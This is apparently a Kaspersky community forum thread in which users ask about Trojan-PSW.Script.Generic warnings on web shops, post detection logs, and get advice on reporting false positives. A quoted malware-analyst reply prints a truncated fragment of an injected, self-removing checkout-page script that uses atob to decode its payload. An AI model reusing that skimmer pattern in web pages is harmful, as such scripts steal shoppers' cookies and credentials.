heur trojan-psw.script.generic

[japselrn1]

Hello 

Every time I visit this webshop, I get a warning message. I have tested the website in the Kaspersky-Tool, where no virus or similar could be found - see attachment.

Why does this message appear (how to fix it?) because the website owner told me that they could not find a virus on their site?

Thank you

 

 

[Flood and Flood's wife]

Hello @japselrn1,

Welcome!

What the merchant says may be correct, there is no virus, however, TROJAN-PSW.SCRIPT.GENERIC = Malware of this family steal cookies and website credentials.

• Log a case with Kaspersky Technical Support, select Malware, Detected threat appears over & over again template - see image1; include all the information you’ve provided here, including images & your research, ask the Kaspersky Lab to let you know if the detection is a false positive; if it’s a legitimate detection, the Lab will provide information to explain to the merchant so they can fix the www.
• After submitting the case, you’ll receive an automated email with an INC+12digits reference number, then, normally, within 5 business days, a Kaspersky Technical Support human will communicate with you, also by email, you may continue to engage with the Kaspersky Technical Team via email or by updating the INC in your MyKaspersky account.
• Note, we’ve been able to replicate the detection: see image 2, KIS Report & FF log

Image 1

Image 2

Thank you🙏

Flood🐳

[Flood and Flood's wife]

Hello @japselrn1,

Additional, adding the KIS Report & FF log I mentioned above & another online scan result:

Thank you🙏

Flood🐳

[japselrn1]

Awesome, thank you for your help!

[Flood and Flood's wife]

Hello @japselrn1,

You’re most welcome😃!

Please share the outcome with the Community when it’s available?

Thank you🙏

Flood🐳

[Berny]

@japselrn1  Also , the site contains a suspicious .js file , K-Lab will confirm or deny a false positive

[Berny]

@melekstore Please contact Kaspersky Technical Support  https://my.kaspersky.com/

[Guedones]

I had the exact same problem when making a purchase on the muscle and strength website. I didn't quite understand what this trojan is about on this site, could anyone give me some guidance or if I should be worried about my personal data?

Event: Download denied
User: DESKTOP-GUEDONE\ander
User type: Active user
Application name: chrome.exe
Application Path: C:\Program Files\Google\Chrome\Application
Component: Web Anti-Virus
Description result: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat Level: High
Object Type: File
Object path.: https://www.muscleandstrength.com/store/checkout/onepage/success
MD5: E058D66C1F5E0ADF8591AACBD20CA51B
Reason: Expert analysis
Database release date: Today, 11/25/2022 11:59:00

[Flood and Flood's wife]

5 hours ago, Guedones said:

I had the exact same problem when making a purchase on the muscle and strength website.

I didn't quite understand what this trojan is about on this site, could anyone give me some guidance or if I should be worried about my personal data?

• Event: Download denied
• Description result: Blocked
• Name: HEUR:Trojan-PSW.Script.Generic
• Precision: Heuristic Analysis
• MD5: E058D66C1F5E0ADF8591AACBD20CA51B

Hello @Guedones, 

Welcome!

1. (Your) installed Kaspersky software blocked the Download (Download denied). 
2. TROJAN-PSW.SCRIPT.GENERIC: Malware of this family steal cookies and website credentials
3. E058D66C1F5E0ADF8591AACBD20CA51B
4. VT https://www.muscleandstrength.com/store/checkout/onepage/success
5. Please read & follow: Kaspersky application blocks my website or application. What should I do? & False detections by Kaspersky products. What to do?
6. We tried to process a txn at the site, however, we could not replicate the error, nor could we successfully complete the txn, the detection may be a false positive *but* the only people qualified to make that assessment are Kaspersky's Virus Lab experts, please log a case with Kaspersky support, on the support page, select either Email or Chat, then fill in Malware, False positive template; support may request logs, traces & other data; they will guide you. 

Please share the outcome with the Community, when it's available? 

Thank you?
Flood?+?

Edited November 26, 2022 by Flood and Flood's wife

[Wesly.Zhang]

On 11/26/2022 at 3:51 AM, Guedones said:

I had the exact same problem when making a purchase on the muscle and strength website. I didn't quite understand what this trojan is about on this site, could anyone give me some guidance or if I should be worried about my personal data?

Event: Download denied
User: DESKTOP-GUEDONE\ander
User type: Active user
Application name: chrome.exe
Application Path: C:\Program Files\Google\Chrome\Application
Component: Web Anti-Virus
Description result: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat Level: High
Object Type: File
Object path.: https://www.muscleandstrength.com/store/checkout/onepage/success
MD5: E058D66C1F5E0ADF8591AACBD20CA51B
Reason: Expert analysis
Database release date: Today, 11/25/2022 11:59:00

Hello, @Guedones

I think this is a false positive, there is no any malware script in that page. But there are some other reason to let you encounter this issue. The first is your browsers addones. The secound is the website request back special html code to you, different from me. So you can disable all browsers addone and re-open the browser to check this issue first. If it is not work, Please reply back here.

Regards.

[Ray Jax]

On 11/26/2022 at 2:14 AM, Flood and Flood's wife said:

Hello @Guedones, 

Welcome!

1. (Your) installed Kaspersky software blocked the Download (Download denied). 
2. TROJAN-PSW.SCRIPT.GENERIC: Malware of this family steal cookies and website credentials
3. E058D66C1F5E0ADF8591AACBD20CA51B
4. VT https://www.muscleandstrength.com/store/checkout/onepage/success
5. Please read & follow: Kaspersky application blocks my website or application. What should I do? & False detections by Kaspersky products. What to do?
6. We tried to process a txn at the site, however, we could not replicate the error, nor could we successfully complete the txn, the detection may be a false positive *but* the only people qualified to make that assessment are Kaspersky's Virus Lab experts, please log a case with Kaspersky support, on the support page, select either Email or Chat, then fill in Malware, False positive template; support may request logs, traces & other data; they will guide you. 

Please share the outcome with the Community, when it's available? 

Thank you?
Flood?+?

I know I'm replying to a dead thread, but I just wanted to make sure. Something similar happened, with the same Heuristic. Should I be worried, even though the download was denied? Thanks. I don't really care about the website itself.

And can you also please tell me how to properly visit sites that don't at all look suspicious? Like, if something that hasn't been detected, and heuristics don't work, then there's not much we can do. Or if the virus is more complex and simply stopping the download isn't enough (idrk too much about viruses, just speculating).


I'll still attach the information in case your experts might wanna check it:

Event: Download denied
User: OMNI\rayya
User type: Initiator
Application name: brave.exe
Application path: C:\Program Files\BraveSoftware\Brave-Browser\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat level: High
Object type: File
Object path: https://bioshop.pk
MD5 of an object: CE24F0DFFC3409D3DBD07758350909F9
Reason: Expert analysis
Databases release date: Today, 10/25/2024 9:27:00 PM

[KarDip]

7 hours ago, Ray Jax said:

I know I'm replying to a dead thread, but I just wanted to make sure. Something similar happened, with the same Heuristic. Should I be worried, even though the download was denied? Thanks. I don't really care about the website itself.

And can you also please tell me how to properly visit sites that don't at all look suspicious? Like, if something that hasn't been detected, and heuristics don't work, then there's not much we can do. Or if the virus is more complex and simply stopping the download isn't enough (idrk too much about viruses, just speculating).


I'll still attach the information in case your experts might wanna check it:

Event: Download denied
User: OMNI\rayya
User type: Initiator
Application name: brave.exe
Application path: C:\Program Files\BraveSoftware\Brave-Browser\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat level: High
Object type: File
Object path: https://bioshop.pk
MD5 of an object: CE24F0DFFC3409D3DBD07758350909F9
Reason: Expert analysis
Databases release date: Today, 10/25/2024 9:27:00 PM

 

Hello @Ray Jax

Just a thought as if Kaspersky or another security software shows a warning for a website that tests clean on tools like the Kaspersky Virus Removal Tool (KVRT), there are a few possible reasons for the message:

1. Suspicious Content or Ad Scripts

• Some websites may use ads or third-party scripts that can trigger security warnings, even if the site itself is clean. Kaspersky may detect the scripts as potentially harmful if they track user behavior aggressively or are known to originate from less reputable sources.

2. Outdated SSL/TLS Certificates

• If the website uses an outdated or incorrectly configured SSL/TLS certificate, Kaspersky may flag it as insecure. Security software prioritizes sites with up-to-date and properly configured certificates.

3. Phishing or Fraudulent Content Flagging

• Some sites are flagged for potential phishing or suspicious activity based on historical data or user reports, even if the website doesn’t have a virus. Kaspersky maintains databases of URLs reported as suspicious, which could result in the warning.

4. Unusual Redirects or URL Structure

• Some e-commerce sites use redirects, particularly for user tracking or cross-site functionalities. If a URL has an unusual redirect or URL structure, Kaspersky may flag it as suspicious.

How to Fix or Bypass the Issue

• Whitelisting: In Kaspersky, you can add this website to your “Trusted URLs” if you are confident that it’s safe. This will bypass future warnings.
• Report a False Positive: If you believe the site is secure, you or the website owner can report it as a false positive to Kaspersky. They review these submissions and may adjust their databases.
• Clear Browser Cache: Sometimes, cached data can trigger repeated warnings. Clearing your browser cache or using a private browsing window may help.

If you have further details on the exact warning (for instance, if it mentions phishing or a specific security threat), maybe i can help clarify further.

Thank you

Edited October 26 by KarDip
edit code element

[Ray Jax]

2 hours ago, KarDip said:

 

Hello @Ray Jax

Just a thought as if Kaspersky or another security software shows a warning for a website that tests clean on tools like the Kaspersky Virus Removal Tool (KVRT), there are a few possible reasons for the message:

1. Suspicious Content or Ad Scripts

• Some websites may use ads or third-party scripts that can trigger security warnings, even if the site itself is clean. Kaspersky may detect the scripts as potentially harmful if they track user behavior aggressively or are known to originate from less reputable sources.

2. Outdated SSL/TLS Certificates

• If the website uses an outdated or incorrectly configured SSL/TLS certificate, Kaspersky may flag it as insecure. Security software prioritizes sites with up-to-date and properly configured certificates.

3. Phishing or Fraudulent Content Flagging

• Some sites are flagged for potential phishing or suspicious activity based on historical data or user reports, even if the website doesn’t have a virus. Kaspersky maintains databases of URLs reported as suspicious, which could result in the warning.

4. Unusual Redirects or URL Structure

• Some e-commerce sites use redirects, particularly for user tracking or cross-site functionalities. If a URL has an unusual redirect or URL structure, Kaspersky may flag it as suspicious.

How to Fix or Bypass the Issue

• Whitelisting: In Kaspersky, you can add this website to your “Trusted URLs” if you are confident that it’s safe. This will bypass future warnings.
• Report a False Positive: If you believe the site is secure, you or the website owner can report it as a false positive to Kaspersky. They review these submissions and may adjust their databases.
• Clear Browser Cache: Sometimes, cached data can trigger repeated warnings. Clearing your browser cache or using a private browsing window may help.

If you have further details on the exact warning (for instance, if it mentions phishing or a specific security threat), maybe i can help clarify further.

Thank you

I just meant to ascertain if there's anything else to do or be worried of, despite the download being blocked by Kaspersky.

[harlan4096]

11 hours ago, Ray Jax said:

I'll still attach the information in case your experts might wanna check it:

Event: Download denied
User: OMNI\rayya
User type: Initiator
Application name: brave.exe
Application path: C:\Program Files\BraveSoftware\Brave-Browser\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat level: High
Object type: File
Object path:  https:// bioshop . pk
MD5 of an object: CE24F0DFFC3409D3DBD07758350909F9
Reason: Expert analysis
Databases release date: Today, 10/25/2024 9:27:00 PM

Quote

 

Hello,

This is not a false alarm. This site is infected.
Here is the malicious code:
<script id="gli0">if(location.pathname.includes(atob('Y2hl ... ById('gli0').remove()</script>
If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

Sincerely, Malware Analyst

 

 

[Ray Jax]

10 hours ago, harlan4096 said:

Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

This is targeted to the webmaster, right? Since it's talking about modifications to website contents. Any thing I should do on my end? Thanks.

[harlan4096]

Nothing, just don't visit that site, it's compromised.

[Ray Jax]

Okay. Thanks. While posting that link here in that message (not even opening the site), the same thing tried to be downloaded (only to be stopped by Kaspersky yet again). It's really odd

[KarDip]

7 hours ago, Ray Jax said:

Okay. Thanks. While posting that link here in that message (not even opening the site), the same thing tried to be downloaded (only to be stopped by Kaspersky yet again). It's really odd

Hello @Ray Jax

No need to worry! Since Kaspersky blocked the download, it successfully prevented any potential threat from affecting your system. Just a few steps to ensure peace of mind:

1. Delete Any Residual Files: Although Kaspersky blocked the download, checking your downloads folder or temp files for any incomplete or suspicious files is a good habit.

2. Scan for Potential Threats: Running a quick or full system scan with Kaspersky will confirm that no other parts of this download attempt slipped through.

3. Keep Kaspersky Updated: Ensure your antivirus definitions and program are fully updated so it continues catching any future threats.

If Kaspersky blocked it right away, your system should be safe, and no further action is needed beyond these checks!

Thank you